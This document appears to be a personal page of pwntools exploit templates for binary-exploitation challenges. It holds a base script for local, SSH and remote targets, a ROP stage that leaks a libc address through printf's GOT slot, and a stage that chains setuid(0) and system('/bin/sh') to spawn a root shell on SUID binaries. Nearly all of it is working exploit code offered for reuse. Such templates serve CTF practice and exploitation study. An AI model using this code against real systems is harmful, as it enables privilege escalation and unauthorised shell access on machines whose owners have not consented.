Templates

Pwntools Linux Base

#!/usr/bin/env python3
from pwn import *

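# Terminal that gdb.debug() opens its window in. Hard-coded to alacritty+zsh;
# adjust to your setup (e.g. ['tmux', 'splitw', '-h']).
context.terminal = ['alacritty', '-e', 'zsh', '-c']
# Path to the target binary. Must be filled in before running: ELF() opens the
# file immediately, so an empty path fails at load time.
target = ''

# Load the ELF once and share the object: assigning it to context.binary also
# derives context.arch/bits/endian/os from it, and the same object is what the
# ROP/leak snippets below reference as `binary`.
binary = context.binary = ELF(target)

# REMOTE mode: the challenge service.
service_host = ""
service_port = 0

# SSH mode. NOTE(security): a cleartext password in an exploit script ends up in
# git history and editor/shell backups; prefer ssh(..., keyfile=...) or an
# ssh-agent, and keep filled-in copies of this template out of shared repos.
ssh_host = ''
ssh_user = ''
ssh_pass = ''
ssh_port = 22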

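# Select the tube `p` from pwntools' command-line flags
# (python3 exploit.py GDB | SSH | REMOTE); with none set, run the target locally.
if args['GDB']:
	# The gdbscript runs inside the spawned gdb. The pwndbg path is user-specific;
	# drop the `source` line if pwndbg is already loaded from ~/.gdbinit.
	p = gdb.debug(target,
	'''
	source /home/xct/tools/pwndbg/gdbinit.py
	continue
	''')
elif args['SSH']:
	# Interactive shell on the box; the target is launched by typing its path, so
	# it must already exist and be executable there, and any shell metacharacters
	# in `target` are interpreted by bash. The session handle `sh` is never closed.
	sh = ssh(host=ssh_host, user=ssh_user, password=ssh_pass, port=ssh_port)
	p = sh.run('/bin/bash')
	# Drain the login banner/prompt (up to 2 s) so it does not pollute recv()s.
	p.recv(4096, timeout=2)
	p.sendline(target)
elif args['REMOTE']:
	p = remote(service_host, service_port)
else:
	# Local run. setuid=True keeps SUID/SGID handling enabled for a setuid target
	# (pwntools disables it via PR_SET_NO_NEW_PRIVS when False) -- only relevant
	# for local privesc targets; confirm against the pwntools process() docs.
	# level='DEBUG' logs every byte sent and received, which is noisy but handy.
	p = process(target, setuid=True, level='DEBUG')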

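# Exploit body: fill in `buf` and the recvuntil() marker for the target.
buf = b""

# recvuntil() wants bytes under Python 3 pwntools; keeping the marker as bytes
# matches `buf` and avoids the str->bytes coercion. An empty marker matches at
# once, so replace it with the real prompt before relying on it.
p.recvuntil(b"")
p.sendline(buf)
p.interactive()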

Leak and jump back

# Stage 1: leak a libc pointer. printf() is called with printf's own GOT slot as
# its *format string*, so it prints the raw pointer bytes stored there (up to the
# first NUL); the chain then returns to _start so the program restarts for
# stage 2. The "%s" is printf's 2nd argument and takes no part in that output --
# NOTE(review): confirm pwntools can place the string without rop.base, or drop it.
rop = ROP(binary)
printf_plt = binary.plt["printf"]
printf_got = binary.got["printf"]
rop.call(printf_plt, [printf_got, "%s"])
rop.call(binary.symbols['_start'])
log.info(rop.dump())

# The 100-byte padding to the saved return address is target-specific.
padding = b"A" * 100
buf = padding + rop.chain()
p.sendline(buf)

# Read the leaked bytes (one line, newline dropped) and widen to a u64. On amd64
# the top two bytes of a userland pointer are zero, so printf stops after six
# bytes and ljust() restores them. NOTE: if the restarted program prints more on
# the same line, u64() raises on the longer input -- slice the leak first.
leak = p.recvline().strip(b"\n")
out = u64(leak.ljust(8, b"\x00"))

Spawn Shell

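# Stage 2: with libc.address set from the leak, build setuid(0); system("/bin/sh").
rop = ROP(libc)
# Pointer to a NUL-terminated "/bin/sh" inside libc (StopIteration if absent).
# Named binsh rather than `sh` so it does not clobber the SSH session handle
# `sh` from the base template.
binsh = next(libc.search(b"/bin/sh\x00"))
# setuid(0) first: on a SUID target, sh/bash drop privileges when euid != uid.
rop.call(libc.symbols['setuid'], [0x0])
# On amd64 system() needs a 16-byte-aligned stack (movaps inside do_system); if
# it SIGSEGVs there, insert a lone `ret` gadget before this call, e.g.
# rop.raw(rop.find_gadget(['ret']).address), to shift rsp by 8.
rop.call(libc.symbols['system'], [binsh])
log.info(rop.dump())

# Same target-specific padding as the leak stage.
buf = b"A" * 100 + rop.chain()
p.sendline(buf)
p.interactive()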

Compile Shellcode with Pwntools

from pwn import *

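# Assemble a tiny amd64 program (cpuid, then exit(0)) into a standalone ELF.
# context.arch must be set before assembling or pwntools assembles for the
# default architecture.
context.arch = 'amd64'

code = """
    // cpuid
    mov     rax, 0x00
    cpuid
    // exit
    mov     rdi, 0x00
    mov     rax, 60
    syscall
"""

# extract=True returns the ELF image itself (written below) rather than a path
# to a temporary file.
elf = make_elf_from_assembly(code, extract=True)

# The file is written without the execute bit: chmod +x cpuid before running it.
with open('cpuid', 'wb') as outfile:
    outfile.write(elf)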
